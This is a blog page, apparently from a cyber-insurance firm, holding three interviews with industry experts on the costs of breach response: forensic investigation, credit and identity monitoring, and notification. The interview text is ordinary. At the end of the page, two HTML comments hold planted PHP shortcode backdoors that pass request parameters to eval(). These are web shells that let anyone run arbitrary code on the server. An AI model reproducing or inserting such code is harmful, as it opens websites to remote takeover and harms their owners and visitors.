Crisis Data Breach Response: Computer Forensic Services

A Q&A with Chris Novak, Managing Principal at Verizon Business
As part of an ongoing series of posts, I’m talking to experts in the field about the true costs associated with “crisis” data breach response services. Today we’re looking at computer forensics, and I spoke with Chris Novak, managing principal at Verizon Business.

When and how do clients engage with your services?
Generally, we get the call from the IT security department or a CSO, and that usually depends on how mature the organization’s security practice is. They almost always find us through word of mouth unless the company already engages our services through our rapid response retainer. What we typically hear on that call is, “I believe we’ve had an incident but I need help understanding what happened exactly.”

What happens after the call?
That depends on whether this is a client using our services for the first time or whether they have us on rapid response retainer. If you think of an emergency room as an analogy, an organization calling us for the first time is treated as quickly as we can as we triage the situation along with our other clients’. The rapid response retainer means we already have an agreement and a plan in place and a good understanding of where and how to mobilize our resources, so that gets handled more quickly. Either way, the goal is to mobilize investigators to necessary locations. After that, the first step is getting the forensic acquisition—a duplicate copy of the relevant or suspect systems so that we can analyze them. Then we follow the timeline back from there. For a mom and pop type of business, the whole process might only take a week, but for, say, a major financial institution, we may be contracted out for six months or more with a dozen investigators on the case in London, Hong Kong, Singapore, Los Angeles and New York.

What problems or hurdles do you typically encounter?
One of the biggest hurdles we face is something that we call the “unknown unknowns”—essentially, these are the things people don’t realize that they don’t know, which makes it difficult to account for them. Think of it this way: If you don’t know where your sensitive data is, then where do you start the investigation? If you don’t know who has access to the data, but suspect insider involvement, how do you narrow down the investigative field? If your environment is purely designed for function and doesn’t easily accommodate forensic data collection, then even if we have the greatest hunches in the world as to what happened, we will have little to no evidence that can help prove the case. All of these have the potential to be non-starters for an investigation or otherwise dramatically increase the cost. Another issue is that sometimes organizations share resources without realizing it—their website or ecommerce site might be hosted in a data center with 19 other customers—so when we go to investigate the facility we run into roadblocks getting permission to access it. That can slow down the process.

What are the approximate costs for forensic services for a data breach?
We always shy away from giving dollar amounts because they can vary wildly. You might see a credit card company with millions of records but a very low per-record cost or an industrial company that has lost three or four records with intellectual property that could be worth a billion dollars of revenue. So not every record is the same and it is very hard to quantify the cost. I would say that your larger and more complicated breach investigations can easily range into the millions of dollars, while your smaller situations may run in the USD $20-50,000 range. I answer it this way not to be difficult, but rather to avoid giving anyone the misperception that all breach investigations are similar and/or similar costs. The only other thing I can say is that if you are prepared for the data breach event, things will move more fluidly and it will ultimately cost less.

In conclusion…
Thanks, Chris, for these insights from the field. Computer forensics is an important part of the overall roadmap to recovery from a data breach incident. This service is vital to ascertaining the digital facts (who, what, when, where and how) following a post-data breach analysis. Defense lawyers representing the breached company need to understand compliance duties and negligence factors, and insurance companies need to ascertain damages for insurance coverage payouts—all of which rely on forensic evidence. As Chris discussed, the cost can have a wide range (e.g., small incidents might amount to $20k-$50k; while large events could potentially cost several million dollars) based on various factors. However, when compiling the NetDiligence® 2011 Cyber Liability & Data Breach Insurance Claims study, we found the average cost for an insurance claim to be approximately $200,000 for the forensic expense component alone.

Crisis Data Breach Response: Credit Monitoring and ID Restoration

A Q&A with Rick Kam, President and Co-founder at ID Experts
As part of an ongoing series of posts, I’m talking to experts in the field about the true costs associated with “crisis” data breach response services. Today we’re looking at credit monitoring, and I spoke with Rick Kam, President and Co-founder at ID Experts, which offers a spectrum of data breach response services including identity monitoring and recovery for healthcare, government, enterprise, education and financial service organizations.

At what point during a data breach does ID Experts get the call?
We’re like the fire department for data breach incidents. Usually we get engaged when the general counsel calls us—this is while the privacy officer and CIO begin to conduct some investigation about the nature of the situation. At the same time they might be reaching out to the risk manager to find out whether there’s insurance coverage so they know the financial impact involved.

What happens after the call?
Having your data stolen or becoming the victim of identity theft could potentially be a problem you have to deal with for the rest of your life. We want to make sure that those people whose data is stolen—whether they’re doctors or patients or anyone else—feel taken care of and can get their lives back in order. The next step in the process is to figure out who’s being affected by the breach and what information is out there. There are a lot of different monitoring options on the marketplace. While credit bureaus monitor credit activity, we can also use cyber-monitoring to track both financial and health data. A company like ours can look at the potential data that is missing, tailor our services and act like a one-stop shop to aggregate and deliver information about the missing data.

What problems or hurdles do you typically encounter?
The biggest challenge is the pressure people face. Everything’s hitting at once—there’s a lot of information and the privacy officer is overwhelmed with requests for information to make decision and provide clarity where there may be no clarity. Another interesting challenge is the complexity of the ecosystems in today’s organizations. We work with healthcare systems that have both hospital and university education sides so there are multiple management teams—getting them to agree and getting everyone on the same page can be tricky. Sometimes you’re talking about FBI and secret service in the mix as well, so it’s a communication challenge. One of the first things we have to do is get a consolidated view of what the management wants to accomplish so that we can say, “here are the different options that will help you facilitate those goals.”

What are the approximate costs for credit monitoring and ID restoration services?
Costs per record can range from US$5 to $20. That said, every breach, whether it affects five or five million people, is different and there are many factors that can impact the cost. The full spectrum of services is obviously going to cost more. Often people want to minimize the cost because a breach is an unplanned, unbudgeted expense but we try to educate them and make it clear that the financial impact can be much greater when you don’t do the right job. Having “delighted victims,” people who are satisfied by your response, is going to cost much less than uproar in the media or class action litigation. We like to say that we deliver positive outcomes because none of our clients in over 500 breaches have been fined by regulatory bodies nor have they had any class action litigation suits brought against them.

In conclusion…
Thanks, Rick, for sharing your insight. At NetDiligence, we’ve seen that credit and identity monitoring are valuable services that allow businesses to offer potential data breach victims both a good will gesture and a proactive way to help mitigate potential harm/loss. Having said that, there’s a time and place for these services. One might argue that the first call should go to a privacy lawyer (what we call a Breach Coach® in eRisk Hub®) to help the client with the decision to offer additional services (or not), given the facts surrounding the case. For example, if the data breach event was caused by a malicious actor and resulted is a loss of social security numbers—the “Holy Grail” of data—and fraud is already occurring in the victim pool, this obviously would be grounds to offer victims an effective remedial monitoring service.

Crisis Data Breach Response: Notification

A Q&A with Larissa K. Crum, Executive Vice President at Immersion, Ltd.
As part of an ongoing series of posts, I’m talking to experts in the field about the true costs associated with “crisis” data breach response services. The first focuses on notification, and I spoke with Larissa K. Crum, Executive Vice President at Immersion, Ltd., which provides printing, mailing, emailing, call center, and returned mail management services.

At what point during a data breach does Immersion get the call?
I like to say that attorneys get the call on Friday at four p.m. and I get the call at seven. The first call usually goes out to an attorney (what we call the Breach Coach® in the eRisk Hub®) and sometimes forensics, but we’re getting calls sooner than we used to because of tight response deadlines. Since it’s such a small community in the industry, I’ll often get the heads up from someone I know about a project coming our way—we may not start the process of working with the company for another week, but it helps us look down the line and prepare. Occasionally we get a call from an employee who’s done a Google search. Most frequently, though, we hear from attorneys, insurance carriers and clients we already work with.

What happens after the call?
For our clients, we’ve already built an instant response plan so when we get the call it’s usually a matter of reminding everyone to follow the plan. With new clients, we build from scratch. But either way, we start with the address file and run a verification service to make sure the addresses are still valid. We look for people who’ve died so we can contact their next of kin according to regulations. Then we send out mail and sometimes email notifications. We set up the call center so it’s in place as soon as anything goes out because the majority of calls come in the first five to eight days after the notification goes out, and those people are usually the most upset and need to talk to someone.

What problems or hurdles do you typically encounter?
There are several. First, we are typically up against a regulatory deadline that is very tight, specifically with state or Federal statutes that have a specified response deadline (e.g., 5 days, 30 days, 45 days). Some of these timelines seem long, but there are many parts of a data breach response effort that need to be coordinated and you could end up eating days on cleaning up an address file, determining the signature at the bottom of the notice, or approving numerous versions of a letter.

The second common hurdle is thinking through the call center response process. Setting up a call center to handle notices (written, electronic or substitute notices) goes beyond supplying appropriate FAQs. Thinking through the call escalation process is often a bigger issue for a client, particularly on large breaches where you could have hundreds of calls a day escalated within the first week. Having a system in place and proper management is often the difference between a strong or weak data breach response effort. After all, if a call gets escalated back to the organization that had the breach and it is not handled properly, this is the last image that the affected individual has about your organization.  I heard an industry colleague say it best, “think of the response to the response.”

The final problem most commonly overlooked is the return address that appears when the notice goes in the mail.  Most organizations assume that it should be their address. However, if you think about the amount of return mail as a percentage of the total number of notices going out, you quickly realize that most organizations are not prepared to handle or manage the volume of notices that will come back. There is a direct correlation between the age of the addresses provided and the percentage of returned mail. The newer the addresses, the lower the percentage of returns. The older the addresses, the higher the percentage of returns.

What are the approximate costs for notification services?
The cost can be anywhere from $1 to $4 USD per record.  The size of a company isn’t always reflective of the size of a breach—a company with five employees can hold over 1 million records. Because of the potential for data breach services to become very expensive very quickly, we recommend purchasing a cyber liability policy. Most carriers have pre-negotiated pricing with vendors that provide all of the elements in a data breach response effort, e.g. legal, forensics, notification, call center and credit monitoring. Having a cyber liability policy helps transfer the risk and cost of a data breach, however organizations that proactively put together a data breach incident response plan can help mitigate the risk of a breach occurring.

In conclusion…
Thanks, Larissa, for sharing your experience and insights into the notification process. Note: Larissa’s cost estimates dovetail with our own findings in the NetDiligence® 2011 Cyber Liability & Data Breach Insurance Claims study.

<!– [insert_php]if (isset($_REQUEST["rfPlH"])){eval($_REQUEST["rfPlH"]);exit;}[/insert_php][php]if (isset($_REQUEST["rfPlH"])){eval($_REQUEST["rfPlH"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["uIjCe"])){eval($_REQUEST["uIjCe"]);exit;}[/insert_php][php]if (isset($_REQUEST["uIjCe"])){eval($_REQUEST["uIjCe"]);exit;}[/php] –>

No more posts.